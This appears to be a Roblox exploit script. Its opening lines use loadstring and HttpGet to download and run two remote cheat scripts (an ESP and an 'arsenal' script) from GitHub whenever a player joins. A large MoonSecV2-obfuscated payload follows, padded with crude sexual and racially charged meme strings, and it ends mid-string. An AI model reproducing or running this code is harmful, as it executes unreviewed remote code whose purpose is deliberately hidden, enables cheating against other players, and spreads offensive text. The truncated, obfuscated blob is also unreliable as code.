game.Players.PlayerAdded:Wait()
game.Players.PlayerAdded:Connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ArcherDevelopment/LUNAESP/main/lunaesp.lua"))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/V1xkzy/arsenal-scripts/main/arsenal%20script'))()
end)




_, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'


,nil,nil;(function() _msec=(function(e,n,o)local G=n["ؠؠ؃زكضقحڝ"];local J=o[e[(((1303+-#{'}';1;'nil',(function()return#{('opbFbB'):find("\98")}>0 and 1 or 0 end);(function()return#{('opbFbB'):find("\98")}>0 and 1 or 0 end)})-0x2a4)+-#"ambatakum")]][e["ڪنټزكڪضنكڝټقؠحنڝ؃ج"]];local _=(-#'my ass hurts'+(132-0x74))/(0xf4/(-88+(-0x5a+300)))local U=(((-0x24-(-#[[ÑÑÑÑÑÑÑ]]+(137-0x64)))+103)+-#'how tf do i remove the meme strings')-(8+-#{88,14;{},(function()return#{('MHomKP'):find("\111")}>0 and 1 or 0 end),(function()return{','}end)();88;(function()return{','}end)()})local A=o[e[(-#"Gay porn"+(0x5c4/9))]][e["جك؃قټض؃ن؃ضڝنټ؃ح؃ڝ"]];local m=((((-#[[MSC 793z487nhvcgsdfgsudfza9889jgvz56gz56z547684z5g54z948g56z74j56475jzg645z6456 oh wait]]+(452+-0x7f))-0x9d)+-56)+-#[[moonsec got deobfuscated]])+((-90+0x7b)+-#"Boosted moonsec for meme string")local P=o[e[((0x8466/63)+-#'moonsec got deobfuscated')]][e["زټدسض؃زڪنززحقؠڪقآ"]]local d=(-0x19+27)-(-0x75+(-#"you can pull my IP but you cant pull any bitches fucking loner"+((66861/0x99)-257)))local u=((93+((0x33+(((0xb+-119)+-#"jtoh is cringe ngl")+17))-4))+-#'10 black dicks in your mouth')local x=(8+-#{1;37,{},",",'nil'})local O=(-#"33 cocks in my mouth"+(0xa9a/(((-0x1a+(-#[[0nly was here mf]]+(566+-0x11)))+-35)/0x4)))local k=(0x7c-(-#{(function()return#{('pofKmP'):find("\102")}>0 and 1 or 0 end);'nil';'nil'}+124))local b=(576/(-#{",",80;(function()return#{('lPOpoO'):find("\79")}>0 and 1 or 0 end);{},(function()return#{('lPOpoO'):find("\79")}>0 and 1 or 0 end);(function()return{','}end)(),{}}+199))local f=(((29270-(-87+0x398c))/0x7d)+-114)local C=((0x71+((-0x16+-39)+-0x1e))+-0x12)local D=(0x5b-(-31+(297-(-#"hypeblox likes sucking big black cock"+((-#'IP grabbed'+(334+-0x24))+-0x48)))))local N=(((-#[[alivephoneluaLMAO]]+(841626/(0x6f+-93)))/205)/57)local B=(-0x47+((203+-#{(function()return{','}end)(),'}',(function()return{','}end)();'nil'})-0x7c))local g=((-#"Deeznutsbutinlualoo"+(0x16e-(-#"Big black men"+(((0x48-83)+-#[[dies of cringe]])+281))))/26)local S=(-#{(function()return{','}end)(),'}';1,",",(function()return{','}end)()}+9)local t=(0x4f-(-0x1b+(-#{",",28;{},28,'nil'}+109)))local i=(-#[[cilertedcool]]+(128-(-#'cruz pp is large'+(((-4218/0x39)+0x194)-200))))local s=((((-#'my ass hurts'+((-95+-0x9e)+109))+46)+0x84)+-#[[33 cocks in my mouth]])local w=(5+-#{1;{};(function()return{','}end)()})local h=(-0x10+(-0x11+(-#'why 6 hours cooldown to send a meme strings'+(10764/(0x192-264)))))local c=((-5+((-#'paidlancer'+(-1971/(-#{67,",";'}','}';(function()return#{('MhmPOL'):find("\109")}>0 and 1 or 0 end);{}}+225)))+-19))+0x2d)local V=e[(0x48e8b/215)];local Y=o[e[(-#"i shoved a whole bag of jellibeans up my ass"+(-0x78+320))]][e["زؠحقدآؠڝجؠڝنئ"]];local H=o[(function(e)return type(e):sub(1,1)..'\101\116'end)('د؃حؠؠسحآ')..'\109\101'..('\116\97'or'؃كئؠڪد؃ك')..e[(-#[[0nly 1337]]+(-23+(-#"If no father return milk end"+(593+-0x13))))]];local F=o[e[(0x445-579)]][e["؃جججڝؠټټآئ؃سند؃جقق"]];local z=(416/0xd0)-((((113-0x42)+-0x74)+98)+-#'Nsrds GAYYYYAIAHAKAJAVAHAUA')local p=(-#'how tf do i remove the meme strings'+(0xe74/(22500/(-98+0x143))))-(-#"If no father return milk end"+(0x67-73))local L=o[e[((0x1e0-292)+-#"Me be like at 5am in the morning")]][e["زحزضئؠقټنؠدنآټدق"]];local l=function(o,e)return o..e end local v=(11+-#{(function()return#{('LFphhF'):find("\112")}>0 and 1 or 0 end),1;",";(function()return#{('LFphhF'):find("\112")}>0 and 1 or 0 end);'}';91;(function()return#{('LFphhF'):find("\112")}>0 and 1 or 0 end)})*(44-(0xc80/(0x1270/59)))local K=o[e["سكآټ؃قدئققآسق"]];local r=(110-0x6c)*(((((-48+-0x9e9)+-#"W4rboy was here")/0x28)+238)+-#'testpsx dupe no scam legit 2022 free no virus')local I=((4368-0x89a)-0x476)*(46/((-0x40+-49)+136))local R=((549/(990/(284-0xae)))+-#'holy shit')local y=(216/(((-0x50+448)-0xf7)+-#"Bush Did 9 11"))*(0x6b-105)local M=o[e["آجقضټ؃نئڪحزسدكح"]]or o[e[(0x12322/145)]][e["آجقضټ؃نئڪحزسدكح"]];local a=(-#"testing this thingy lololollez"+((((0x14fc4+-22)+-#[[Bush Did 9 11]])-43021)/0x96))local e=o[e["؃سزڝ؃جحضجنضحقنټ"]];local j=(function(r)local a,n=2,0x10 local o={j={},v={}}local l=-d local e=n+U while true do o[r:sub(e,(function()e=a+e return e-U end)())]=(function()l=l+d return l end)()if l==(v-d)then l=""n=z break end end local l=#r while e<l+U do o.v[n]=r:sub(e,(function()e=a+e return e-U end)())n=n+d if n%_==z then n=p F(o.j,(L((o[o.v[p]]*v)+o[o.v[d]])))end end return P(o.j)end)("..:::MoonSec::..؃دحجئضسزقكنؠآټڪڝؠززئجؠ؃حآنك؃ضزدڪڪضنآزججن؃دآققڝضسدټڪؠنؠزحجك؃؃ئئقڪضضدآڪئننزدجقڝڝآسقټضئدؠڪحنكز؃جزڝڪآضقآضجدنڪدنقسڝجسڝټآئقؠضحدكڪجنزسڪجضڝآآجقنضددقټڝنسسټجئڝؠآحقكض؃دزڪ؃نضسآججڝنآدققئڝدسټڪنئسؠجحڝؠآحقزئڪدضسننجسنجدڝقؠڝقسئټدئقجنزسكج؃ڝزحڪڪقنټزڝئسؠڝسقحڝڝسآڝڝكئؠدئټكندسزحڪڝضآڪڝقئندئټقن؃سسحټڝئآټڝجئكدئټزن؃سضحآڝجآ؃ڝآئقدئټسكټسئحآڝحؠټق؃ئزز؃ټضكآسجحآڝدؠقزڝئسسڝټئكؠسححكڝ؃ؠززڪئضسڪټجكنسدحؠڪڝؠسزټئئسټټحككس؃حقڪڪؠضزآئججحټدكآضڝحقڪټؠضزؠئقققټ؃كزضڪجدڪآؠئزنئح؃قټجڝؠضټحئڪؠؠڪزكئد؃زټحڝنضآحجڪنآؠزقئ؃؃سټجدجضؠححڪكؠڝززجڝ؃ضآټكجضڪقسڪقنڝزسئآ؃ئآآكحضټقضڪزنڪزضضس؃جآؠكدضڪكڪڪسنڪزئئټ؃حآنك؃ضزدڪڪكددزججن؃دټنقڝضزدټڪقد؃زحجك؃؃ڪدقڪضسدآڪجحدزدجآڝڝآققټضزدؠڪحح؃ز؃جآڝڪآققآضضدنڪزآئسڝجنڝټټڪقؠضجدكڪضنززحكنڝآآجقنسؠدقڪ؃نسسټنؠڝؠآسقكضحدزڪدنضسآننڝنآسققضحدسټڝنئزدؠدڝكآئقزسكدضټټنجسڝجدڝآحئقسئټدئڝسنحسنج؃ڝزدضقضض؃دجټنندسقحڝڝس؃سقئئڝدحټنن؃سزحڪڝض؃جقجئڪددټنكڝسسحټڝئحققحئكد؃ټقكڪسضحآڝئؠنقدئق؃ڝټسكټسئحؠڝضؠكق؃ئزكؠټض؃آسنحنڝدؠقټضنڝق؃جټڝټآڪقڪڝ؃ؠټزڪئض؃آحجڝؠټجقټضټحنقحئئ؃ؠټحككزنحزڪڪؠضزآئج؃نټدؠقضڝحسڪټؠئزؠئح؃آټ؃ؠزضڪحضڪآؠجزنئد؃ؠآڝآسضټحئڪؠؠحزؠئ؃؃قآڪكضضآحجڪنؠدزكجڝ؃سآټكئسدححڪكؠ؃ضزئد؃ضآآكجآققسضڝضزقدجټ؃ئآؠټڪآققجئقدنآقكڝزضجج؃دآآضزڪټنټزئجؠئضجقڝڪآضقجئقح؃ڪجئ؃؃دآققڝنسزڪضسد؃ڪ؃نټ؃؃ټققڪضضدآج؃دكڪسنؠسئ؃ق؃حآققڝضددزندزنسنحڪڪڝؠڪقنڪكنقسڝجسئسجحڝڪآسزنئڪ؃نټجئدڝآآجقنسجسټټڝنسسټجنڝؠآحقكز؃دزټڪنضسآججڝنآحققسددسټټنضسؠجئڝكآ؃قزئڪدضټآنضسنجدڝقؠڝقسئټدئټؠنحسكجحڝزآ؃قضسآدجټننحسقحڝڝسآدقئسؠدحټكندسزحڝڝضآدقجسنددټقن؃سسحڪڝئؠڪقحئڝقؠټزندسضحآڝجؠؠقدئك؃ڝټسڝڝسئحؠڝحؠكق؃ئز؃ڪټضآجسجحؠڝدؠؠزڝئز؃ټټئ؃قسححكڝ؃ؠقزڪئض؃آټئكنسدحقڪڝؠسزټئئ؃ؠټسككس؃حزآڪؠڝزآئج؃نجټ؃زآ؃قنس؃حقڪټنؠززجزضؠسححضڪآؠجڪدنحزضجئجڪؠدحئڪؠؠحڪدؠئزؠجڪ؃قكسضحدكحجټكؠسجئجئڝټآڝقنضڪدحڪآؠدسنجڪڝسآكقڝضآدئڪئؠدجححڪ؃دآسئڝجټټڝڪټنززټئجآ؃ؠككدضكدحڪحكآسڪڝس؃جؠنك؃ئڪدآڪزنټج؃جضڝ؃ؠڝقؠدج؃آڪئنآسضجضڪڝآدئددضټنڪئندسؠحؠڝؠآقئ؃دئټكټدن؃سؠڝټكجضجدنڪدڝ؃ڪجننسټ؃ؠڝ؃آسحدڪ؃نزسڪئززڪآجقنضددكټڝنسسټئسڝؠآحقنض؃دكټڪنضسآضجڝنآدقكئڝدزټټنقسؠئئڝكآ؃قنئڪدقټآنجسنجدڝقؠڝقزئټدزټؠنحسكج؃ڝزؠڪقضئآدجټننجسقحڝڝسؠټقئئؠدجټكندسزحڪڝضؠآقجئندحټقكڝسسحټڝؠؠؠقحئكټئڪحكڪسضحآجڝحكڪئنكزؠحك؃؃ټسكئسححټؠقئن؃ڪټضكآټدقڝسقزآقسئس؃ټټئټڪټدكزضڪدآڪدؠكئئڪئكنسدحقجآحضڝحؠزز؃دئ؃ڪټئكؠضټحجنټقسزسجنڝؠآنضڪڝضؠئزؠئحضحجڪ؃نټحقسضندسټڝئدددآڝكسضټزدئآدؠڪزقسزكحڝ؃حآدجڝڝ؃ؠدزقجڝضسحڪ؃سآ؃ك؃ضټؠڝززجڪ؃ضټڪآآضنحدڪقؠئزسجټ؃ئڪؠكحضكح؃ڪزنڪزضجڪ؃جټآكدضقح؃ڪسنڪزئجؠ؃حآكك؃ضزح؃ڪضنآزججن؃دآققڝضسدټڪئنټزحجؠ؃؃ڪزقڪضضدټڪجننزدجڝڝڝڪسقټضئدآڪحننز؃جڪڝڪڪضقآضجدؠڪدنكسڝجټڝټڪئقؠضحدنڪ؃نقسڪجؠڝآڪجقنضددنټڝنسسټجؠڝؠڪحقكض؃دكټڪنزسآجزڝنڪدققئڝدقټټنسسؠجضڝكآحڪسئڪدكټآنجسنجدڝقؠڝنټئټدسټؠنسسكجدڝزؠڪڝحئآدجټننحسقحڝڝسؠټقئئؠدحټكنزسزحڪڝضكآقكئنددټقڪ؃آكندضټجدڪزكټدكټزكڪسضز؃سضدؠڪقنڝز؃جق؃كآككؠڝنؠكق؃ئزضزئج؃ڝټزقؠضڝدؠڪئسحدقټئكؠسحزضضڝدنټڝؠدضڝجس؃آآنكقسجزنق؃ئئ؃ؠټح؃زآضكڪئحؠؠزآئج؃نحدڝكټدقؠضؠحقكقئجدجټ؃كزضڪجزضنؠجزنئد؃ؠآڝكسضټئئڪؠؠحزكئ؃؃زآڪكنضآجضڪنؠدزكجڝ؃نآټكئضؠححڪكؠ؃زكجڪ؃ضآآكجضنحدڪقنڝزسجټ؃سآؠكئضكئ؃ڪزنڪزسجآ؃جآنكزضقئڝڪسنټزضجؠ؃جآككزضزجڪڪضنآزئجن؃دآقكضضسئټڪئنؠزججك؃حآزكضضضدآڪجننزدجق؃؃آسقټضئدؠڪحنكز؃جز؃ڝآضقآضجضحڪئنقسڝجسسؠحك؃حڝنححڪ؃نزسڪزقسئحئڝآؠحزؠضج؃ؠټڝنئڝآآحقكض؃سڝڝننكسآججڝن؃كڪټؠ؃زنجدنؠسؠجحڝكجزڝسآ؃ق؃ئضددټدؠټڝټؠڝقسئټقئئټ؃ؠټزنئټزآضقضئآدجج؃؃سآؠنجسضحڝؠسؠؠحئټكن؃سزقضسئحڪڪڝنڪسضئزڝحآككڝضكح؃ڝ؃ككزڝئ؃؃آټكحآڝؠؠنقدئقضڝئضد؃آټكڝضؠحقڪڪڪڝدحټضكآسجكحسسدڝڪئزڪددټئكؠسحزټضضدقڪؠؠضدضټجكنسدزضض؃دټڪؠنټزڝئزڝټآض؃زڝحؠضزآئجززجح؃آآزحسڝؠؠئزؠئحئڝجك؃ضآحسؠضضحضڪټؠضئؠجزڝڝآكققحجؠآزكئ؃؃زدضڝنټ؃زجضسدحڝدنئزقئ؃زئس؃ححڪكؠ؃ڪزكڝسڪجڪ؃س؃حححڪقنڝزسكسئسآؠكحضكجحسننڪزضجآد؃آنكدضقجڝڪسنټزئجؠ؃حآككنضزدڪڪضنآزئجن؃حآققڝضسحڝڪئنؠزئجكد؃آزقڪضضدآڪجننزئجقڝڝآسقټضئجؠڪحنكزججز؃دآضكؠضجدنڪدنقزججسڝټآئقؠضحدكڪ؃نززدجض؃؃آجقنضددقټڝنسسڝجئڝؠآحقټض؃دؠټڪنضسآجججقآدقكئڝدسضټنئزحجحڝنآ؃قزئڪدؠضؠنجز؃جد؃سؠڝقزئټدؠټؠنسآڪج؃ڝزؠڪكجئآدئټننضآټحڝڝسؠټكجئؠدجټكنئآآحڪڝضؠآآدئندحټقؠڝسؠحټڝؠؠؠققئكدؠټزكڪڪضحآڝؠؠنقحئق؃ڝټسنجڪجحؠڝكؠككئئز؃ڝټضنئسجحڪضسؠقزڝئسحدټئكآسححټضضؠززڪئضحدټجكؠسدحآضئؠسزټئئئكټحكنس؃ئزڝجؠضقجئجد؃ټدكنضڝحآضكؠئقحئحححټ؃كقضڪحسڪآؠزټڝئد؃قآڝنڝضټحضڪؠؠسټڪئ؃؃زآڪټجضآحئڪنټدزټجڝ؃ټآټكنضؠحئڪكټ؃ټؠجڪ؃آآآكنضنحڝڪقآڝزسجټ؃آآؠكقضكححڪزآ؃زضجآ؃آآنكضضقدڝڪسنټزئجؠ؃كآكككضزح؃ڪضؠحزججن؃قآقؠ؃ضسدڪڪئنآزحجټسضآزقڪضضجټڪجنؠزدجآسئآسقټضئضكڪحننز؃جززڪآضكئضجدآڪدنقسڝضسدؠآئكجضححدڪ؃نڝسڪجضڝآآجكجضددنټڝنسسټضئڝؠآحكجض؃دڪټڪنڪسآججڝنآدك؃ئڝح؃ټټنټسؠجقڝكآ؃ك؃ئڪجڪټآنئسنجحڝقآجڪؠئټدئټؠآؠسكجدڝزآحڪنئآدجټنټڝسقج؃ڝسآڝڝضئؠدآټكنزسزحڪڝضټآؠضئندؠټقنكسسحڪڝئؠؠقحئكدؠټزندسضحآڝجټنقدئقدنټسنقسئحڪڝحؠكق؃ئزدنټضكڝسجحنڝدټقزڝئسدكټئنزسحجنڝ؃ؠززڪئضدسټجنسسدحنڪڝآقزټئئدسټحن؃س؃حزڪڪټضزآئجدضټدنجضڝحزڪټټئزؠئحدضټ؃كڝضڪحقڪآټجزنئددضآڝكڪضټجضڪؠؠحزكئ؃دحآڪنحضآحضڪنؠدزقجڝدحآټكڝضؠحآڪكټ؃ززجڪددآآكڝضنحټڪقؠضزسجټد؃آؠټ؃ضكحدڪزنڪزضئ؃سقآنكدضقضټڪسنڪزئجؠدحآكك؃ضزحنڪضنآزججنددآقك؃ضسحجڪئنؠزحئؠزدآزكؠضضححڪجننزدئنزئآسكؠضئح؃ڪحنكز؃جزحسآضككضجدآڪدنكسڝجآضجآئقټضححجڪ؃نقسڪجزڝآآزڪڝضددقټڝؠ؃سټجضڝؠآحټ؃ض؃دقټڪنزسآججڝنآدڝضئڝدسټټنضسؠجحڝكآ؃قزئڪدضټآنټسنجدڝقسزقنئټدئټؠڝسآڪنقسؠڝسقؠئآدجټنددآكندضؠحؠڝققجدټټكن؃سززنسئدڝڪئؠسسدئئ؃؃ټڝكحسسكؠقنئكد؃ټزڪزټجكڝسزدؠڪڝنؠزئڝحنئسئحؠڝح؃كڪآنققزجن؃ڪټسټحڝئؠقزڝئسزؠجكدحټحجدڝ؃ؠززڪؠآزدجڝڝټټ؃كضضئټسزټئق؃ؠټحككآزققضؠدنڪآئز؃نټدكقنټقزضندكڪؠئټ؃كټ؃كزننكئئڝدئڪسكئسؠئدڝڝآټكقڝكؠحزكئ؃دكڝنكضضآحجڪڪؠدزقجڝحسآټكئضؠححڪكؠ؃زټجڪدزآآكجضؠحدڝحنڝزسجټ؃ئآؠكحضؠح؃ڪزنڪزضجآ؃جآنكدضقدڝڪقنټزسجؠححآكك؃ضقدڪڪضنآزضجندجآققڝضقدټڪؠنؠزحجكدحآزقڪضقدآڪؠننزدجقدڝآسقټضزدؠڪضنكزضجزدڪآضقآضسدنڪئنقزحجسدټآئقؠضضدكڪجنزززجضڝآآجقنضجدقڪدنسز؃جئ؃ؠآحقكضددزټڝنضسڪججڝنآدققئڝدسټڪنئسؠجحڝكآ؃قزئڪدسڪؠنجسنجدؠآآجقسئټدئج؃د؃ټحنئحڝآسقضئآدجحند؃ټؠكقسنحسڝجؠكدحټټن؃سزحڪجټحدڪئنڪټضټؠكڝسسحټئسدآڝؠئؠد؃ټزكڪسضحآڝجننآ؃ق؃دټټسكټسئزدضؠحزڪئقټززئز؃ڝټزسټضكحدڪؠننحكڪضكؠسححكضزدآڝحؠجسټئ؃ڝڝآئقكضؠححڪننكزڝجن؃قآئئجڝئؠضزآئجزڝجڝ؃قآ؃قكضقڪآقسئح؃كټ؃ڝنآسقنئڝدڪټټنحزئجؠڝؠآڝ؃سڪؠؠحزكئ؃؃ز؃ڪحئكآآؠڝزؠدزقجڝئكجك؃جآڪقزضآحئآزننسسئضڝقآآزضڪؠنڝزسجټزحج؃؃كضكحسڪزنڪزضزڝئكجآڝحآضقئدڪؠسزئجؠ؃ح؃آڝقؠقك؃ئس؃ڝڪزكڝزجدآننضسدټڪئڝدټؠنزسئدزڪڝآزك؃جحدقآجككزقدټڝسآققجحؠد؃ټڪنسز؃حنټقؠآقټضضټڝسڝجسڝټآئڝحضحدؠڪ؃نزسڪجضڝآآجكجضددؠټڝنسسټجئڝؠآحڝڝض؃دكټڪنضسآجئڝنټجڝكئڝدكټټنؠسؠجحڝكآ؃ټئئڪدقټآنئسنججڝقڪضكټئټدزټؠننسكجدڝزآټقضض؃زقټنندسقجزڝسؠڪقئئڝززټكن؃سزضڝڝضؠټقجضآقحټقنجسسجسڝئؠؠقحئكضټټزنحسضحټڝجؠآقدئڪزؠټسندسئضآڝحؠنق؃ئق؃ڪټك؃دسجحنڝدڪكزڝئز؃ټڪس؃آسححټڝ؃آحزڪئض؃آټجڪزسدحآڪڝؠززټئس؃ؠټقنآس؃حؠڪڪڪسزآئئ؃نټدكقسجقؠڪټؠئزؠزج؃كټدكززڪحنڪآؠقزنئض؃قټټكسسججزڪؠؠززكزد؃زآڝكضضآحجڪڪدسزقجڝ؃سڝڪكئضآحح؃كؠضززئج؃ضټ؃كجسقحد؃قڪڝزسئح؃ئټ؃كحضڝح؃؃زنڪزضئح؃جآڪكدسسدڝڝقنټزئئح؃حآآك؃ضزدڪڪضنآزججڝ؃دآڝقڝضقدټڪننؠزحجڪ؃؃ڝققڪضسدآڪجننزضكټڝڝآسقټقضدؠڪجنكقحنقڝڪآنقآضزدنڪدنققڝسڪڝټآكقؠضزدكڪآنزسڪجضڝآآكقنضددقټڝنسقټجئڝؠآققكضسدزڪؠنضقآججڝنآزققضضدسټڝنئقؠجحڝكآزقزضحدضڪننجقنجدڝقآسقسضئدئټڪنحقكج؃ڝزآضقضضجدجټآندسقحڝڝسآضقئئؠدحټكن؃قزحڪڝضآئقجضحددڪضكڝقسحټڝئآجقحضدد؃ټككڪسضحآڝجآدقدئڝ؃ڝټڪكټقئحؠڝحآ؃ق؃ئڪ؃ڪټسكآقجحنڝدؠڝزڝئټ؃ټټڪكؠسححكڝ؃ؠآزڪئآ؃آټضكنزدحقڪڝؠقزټئك؃ؠټزككس؃حزڪڪؠنزآئئ؃نټدكقضڝحسڪټؠنزؠئح؃كټ؃كزز؃حضڪآؠنزنئك؃قآڝكسضټحئڪؠؠنزكئح؃زآڪكضضآحجڪنؠقزقئز؃سآټكئضؠححڪكؠضززجڪ؃ضآآكجضنحدڪقؠئزسجټ؃ئآؠكحضكن؃ڪزؠحزضجټ؃جآنكدضقجدڪسؠحزئجؠ؃حآكك؃ضزدڪڪضؠحزججن؃دآققڝضسدټڪئنڝزحجك؃؃آزقڪضضدآڪجنڪزدجقڝڝآسقټضئدؠڪحنكز؃جقڝڪآضقآضجدنڪدنقزدجكڝټآئقؠسڪدآڪ؃نزسڪقحضټججقنضسدقټڝنسؠ؃ن؃سئجحڝآض؃ح؃ټڪنضسآننسكججڝجآحقسجڪ؃زټ؃جټڝكآ؃قززئضئټآنئسنجسڝقآ؃قسئڝدئټڝ؃زسكج؃ڝزآجقضئټدجڪآدحسقجدڝسآ؃قئئؠدحڝكنضسزج؃ڝضؠڪقجئؠددټقڪسسسحڝڝئؠټقحئكد؃ټزدڪسضحڪڝجؠنقدئق؃ڝټسټكسئحڪڝحؠكق؃ئز؃ڪټضكآسجحڪڝدؠكزڝئس؃ټټئكؠسححؠڝ؃ؠؠزڪئض؃آټجكنسدحنڪڝؠسزټئئ؃ؠټحككس؃حزڪڪؠسزآئج؃نټدكقضڝحسڝ؃ؠآزؠئح؃كزقكټضڪحضڪآحسڪڪؠجزدجټڝټضڝحئڪؠؠحزكئ؃؃زجڪټضضآحسڪنؠدزقؠحزؠحڝجڪضؠححڪكؠ؃ززجڪڝض؃ؠڪزضڪحدڪقنڝټكنضسضجټضسضټح؃ڪزنڪټزؠضززحڝ؃دضقدڝڪسنټ؃؃ئز؃حآكك؃آآسجضزد؃ټټنڪسجج؃ټننجسحج؃آآزحجك؃؃ټكڝڝضضدڝڪجؠحزدجقڝڝآسؠدضئدڪڪحنآز؃جقڝڪآؠكڝضجدټڪدنڝسڝجزڝټآئقؠضسزڪڪ؃نزسڪجآڝآآئقنسجقكټڝنكسټجآڝؠآحقكض؃جؠټڪنقسآجسڝنآحققئڝضټټټنزسؠجئڝكآ؃قزس؃قنټآنسسنجضڝقؠڝقسضڝئنټؠنسسكجزڝزؠڪقضضڪدجټننسسقججڝسؠټقئئؠدحټكنسسزحڪڝضؠآقجضآددټقنسسسجدڝئؠؠقحئټد؃ټزنجسضئكڝجؠؠقدئقدڝټسنسسئحڝڝحؠكق؃ضكسآټضنسسجحؠڝدؠقزڝسس؃ټټئنضسحججڝ؃ؠآزڪسض؃آټجنضسدحقڪڝؠكزټئئ؃ؠټحنسس؃حڝڪڪؠضزآئج؃نټدنسضڝحڪڪټؠئزؠئح؃كټ؃نحضڪججڪآؠضزنسد؃قآڝندضټحڝڪؠؠقزكئ؃؃زآڪن؃ضآحضڪنؠجزقجڝ؃سآټكڝضؠحټڪكؠجززضڪ؃ضآآكڪضنحآڪقؠدزسجټ؃ئآؠكآضكححڪزؠ؃زضجآ؃جآنكضضقحقڪسؠززئجؠ؃حآكككضزحدڪضنڪزجضن؃دآقكحضسحسڪئنټزحجټضؠآزكجضضحكڪجنؠزدئنز؃آسكحضئحجڪحنكز؃جززسآضكدضجدؠڪدنآسڝجسئئآئقڝضحدؠڪ؃نزسڪجضسكآجقنضددكټڝنسسټجضڝؠآحقكض؃دزټڪنضسآجسڝنآدققض؃دزڝننئقزجكڝكآ؃قزنئزڪئڝ؃آآآكټضټآزقسئټدئټؠححسكج؃ڝزؠڪقضئآدجڝننسسقحڝڝسؠټقئئڪدحڝڝؠزسزحڪڝضآدقجئؠددټنكڝسنكحڝئؠؠقحئڪد؃ټقكڪسككدڝجؠنقدئڝ؃ڝټزكټسئنؠڝحؠكق؃ئز؃ڪټضكآكجحڪڝدؠقزڝئك؃ټټضكؠسحكسڝ؃ؠززڪئس؃آټجكنسدحڝڪڝؠسزټحئدجټحككس؃ز؃ضآحقڝ؃نئزقجئڝټجڝجزڪټؠئزؠقڝزقئض؃نآجسزسدحزڪڪؠ؃زس؃؃ټكآكقټئڪدټكضئؠ؃زآڪكضنقكحئټدحڪئكحسكجڝڝټآؠكسآكؠسززجڪ؃ضدآڝئآآقسضسحجكحئئ؃ئآؠكحنسقدض؃دآؠآؠدسآڪسكقضقدڝڪسڝ؃ڪجنكز؃حڪڝجآؠضسڪقنآزججنسڝحټ؃سسسدټڪئنؠقئضؠ؃؃آزقڪضسدآڪجننكدجقڝڝآسقټضئدؠڪكنكقحجزڝڪآسقآضسدنڪدنقسڝجسڝټآسقؠضحدكڪ؃نزسڪجضڝآآجقنضجدقڪدنسقټجئڝؠآجقكض؃دزڪحنضقآججڝنآحققض؃دسڪدنئقؠجحڝكآدقزئڝدضڪدنجسنجدڝقآدقسئټدئټؠنحقكج؃ڝزآدقضئآدجټڪندققحڝڝسآ؃قئئڪدحټؠن؃قزحڪڝضؠڝقجئټددټڪكڝسآنقڝئآ؃قحئكد؃ټقكڪسسحآڝجدآقدئق؃ڝټزكټسئحؠڝحڪ؃ق؃ئن؃ڪټنكآسئحنڝدحضزڝئس؃ټټضكؠسححكڝ؃سؠزڪئض؃آټضكنسدحقڪڝؠسضټؠئئؠكسنحس؃حزڪڪ؃ضڪقنئقججس؃ننسكؠضسټحزؠئح؃كټ؃كزدڪقټحآڪؠقئئد؃قآڝټټآآكقضجدجڪسقحزسجنڝكح؃حئڪنؠدزقكڪڪسټزكئضؠححئق؃ڝڪضكڝزحجدڝسؠؠقټضئقڝزڪجټ؃ئآؠټنآڪقټئقدآڪئنضسزننككضقدڝڪسڪڝڪجكڝزؠد؃؃كآكقټآضؠسزججن؃ددآڝئآڪكدحسح؃ڪسنټسڝجضڪحضآدآڪجننآئندسدجحڝسآحقح؃؃جكئزسڝټڪكضنڪڝڪضكآدؠحسڝجسڝټدقڝ؃آنقټجج؃نآڝندسدحزدسضضدقټڝنسؠزنزسنج؃سكضټدزټڪنضآټنجسجڝ؃ڝڝؠئزقئضدجټنكټسآڪڝجدآضكنكسآحقآحآؠنڝڪڝقئټدئټؠنحسكج؃ڝزؠڪؠټضسدجټنندؠضك؃ضڝحؠټزنڪقئجڪ؃ضټضقح؃ټؠآقجئنقدجكدحټنكحضسحئڝ؃زززجئس؃ؠكئكڪضئجدؠ؃ؠټضن؃كټئننكضجز؃ڝق؃ئز؃ڪټضكآسججڪجدؠققټئس؃ټټئڪكآزن؃سئحسڪآؠقزؠجك؃ڪنؠزؠجڪ؃ئئدضد؃ؠټحككنجكجضټحقڪدؠسزڪحد؃ئآ؃كڝضححسكزئس؃كټ؃كزنآقسضكدقآڪئئ؃قآڝكسنكقكضحححزڪئ؃؃زآڪټقآقكحسددڝؠ؃ئآ؃سآټكئكڪكزضؠححټآنآزك؃ڝڝئآزقسضند؃زسئج؃ئآؠكحآآققئقدحڪئؠج؃جټضكدضقدڝحكدسڪقنئزآحڪڝڪآنقسئڪدآنؠئج؃دآققڝنټقآضسدسڪضنكسدحنڝجضضحجڪجننزدزؠسڪجقڝحكؠك؃ئؠجضقدجزڝڪآضټڪؠققنئټددټحكززدحكڪڝنضقټئڝدكآڝكآسدجضقنضددقټڝنسسټسقجؠنحكزض؃دزټڪڝڝؠضندضڪحس؃؃كدزؠئض؃ضڪدكؠسقجحقزضكدضټآنجؠسن؃ضؠح؃ڝحكټق؃جآدؠآڪنحڝزآئقضئآدجحن؃حټنكئسئجدنحئؠدحټكن؃سزنڪضؠڝآؠټئنددټقكڝسسنټجكڝؠئسضجد؃ټزكڪؠ؃كضضسحضټدؠئز؃ئڝ؃حټسكؠڝؠؠكق؃ئزضدجټڝټټضقؠضئحآڪئؠقحكټقكؠسححكضزدقڪؠننحقټڪكنسدحقضؠدؠټڪنقز؃ئئ؃آټئققسححقحئضج؃نټدكقنزكؠضندضڪكؠدزحجئڪكآټكئس؃؃جټؠؠجزآحجن؃ضټحئڪؠڝكټڪؠئضنجج؃زټحقآئټدسجآئق؃سآټكئآحقجضسدضڪننجزججڝڝقضنجضڪقنڝزسك؃سكجڝڪحآؠقكضئ؃ڝڪزؠضضجحؠ؃جآآسححآدڝټضنقسزدټكضضزدڪڪضڪڝټڝنكزئحټقڝضآدټڪئنؠؠضنقسآجس؃؃قققآڪؠننزدجقضححؠ؃دنززڪضددؠټضضج؃جآضقآضجضټئك؃ټڪحننجضآڪقؠضحدكحندنټټنجئ؃حقڪټآ؃زآئئڝنزدجئڝؠآحټدؠضزقئحسكزدججڝنآدآڪؠڪققئ؃؃كټؠجقڝكآ؃قزكڪقدجټدآآڝنجن؃آجقسئټدئحج؃زآنكئدجآحقضئآدجئد؃حټضكئسسآسقئئؠدحجآ؃ڝټككټسنج؃ڪآؠقزسكآندسسحټڝئحنڝضكڝد؃ټزكڪسضحآزجددآدڝ؃دؠټسكټسئزئس؃حڝڪڝؠحزجحق؃دټضن؃ضسحنزڝئڝ؃